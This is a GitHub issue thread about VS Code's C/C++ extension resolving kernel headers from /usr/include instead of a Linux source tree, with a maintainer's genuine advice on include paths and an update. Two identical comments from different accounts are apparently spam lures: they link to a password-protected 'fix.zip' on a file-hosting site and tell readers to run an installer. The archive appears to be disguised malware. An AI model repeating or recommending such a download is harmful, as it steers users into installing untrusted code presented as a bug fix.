### ISSUE TITLE
IntelliSense does not use the correct header files for code inspection

### ISSUE THREAD

**Issue by QianheYu** [microsoft/vscode-cpptools#12627]
### Environment

- OS and Version: Windows 11 
- VS Code Version:  1.92.2
- C/C++ Extension Version: 1.21.6
- If using SSH remote, specify OS of remote machine:  Fedora 40

### Bug Summary and Steps to Reproduce

Bug Summary:
I am developing a Linux driver using vscode and I added /home/fedora/workspace/linux-6.10.6/include/** and /home/fedora/workspace/linxu-6.10.6/arch/** to the includePath. , but vscode introduces /usr/include/linux/module.h instead of /home/fedora/workspace/linux-6.10.6/include/linux/module.h in #include<linux/module.h>, which causes the The error checking function does not find the correct function declaration.

Steps to reproduce:
1.  Add `/home/fedora/workspace/linux-6.10.6/include/**` and `/home/fedora/workspace/linux-6.10.6/arch/**` to includePath
2. Write an example linux driver
4. On `#include <linux/module.h>` Click Go to Definitions will open /usr/include/linux/module.h instead of /home/fedora/workspace/linux-6.10.6/include/linux/module.h
5. See many code errors(with red wavy lines) that were correctly redirected to the definitions, seems to be just referring to incorrect header files when checking the code, like `module_param(major, int, S_IRUGO);`

Expected behavior:
1. On `#include <linux/module.h>` Click Go to Definitions can open /home/fedora/workspace/linux-6.10.6/include/linux/module.h or shield the search path /usr/include
2. IntelliSense can use the correct header files for code inspection

### Configuration and Logs

```shell
{
    "configurations": [
        {
            "name": "Linux",
            "includePath": [
                "${workspaceFolder}/**",
                "/home/fedora/workspace/linux-6.10.6/include/**",
                "/home/fedora/workspace/linux-6.10.6/arch/**"
            ],
            "defines": [],
            "compilerPath": "/usr/bin/gcc",
            "intelliSenseMode": "linux-gcc-x64",
            "cStandard": "gnu17",
            "cppStandard": "gnu++17",
            "dotConfig": "/home/fedora/workspace/linux-6.10.6/.config",
            "browse": {
                "limitSymbolsToIncludedHeaders": false,
                "path": []
            },
            "forcedInclude": [
                "/home/fedora/workspace/linux-6.10.6/include/linux/module.h"
            ]
        }
    ],
    "version": 4
}
```

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sean-mcmanus** [comment]
@QianheYu 1.21.6 and earlier with recursive includes will exclude system includes by default, so you need to add `/home/fedora/workspace/linux-6.10.6/include/` without the "**". This will change starting with 1.22.0 due to the fix for https://github.com/microsoft/vscode-cpptools/issues/11485 .

**Comment by sean-mcmanus** [comment]
@QianheYu Can you try https://github.com/microsoft/vscode-cpptools/releases/tag/v1.22.0 ? We expect that should fix the issue. Although, be aware that the subpaths under `/home/fedora/workspace/linux-6.10.6/include/` may not be in the correct order, which you can work around via adding non-recursive includes beforehand.
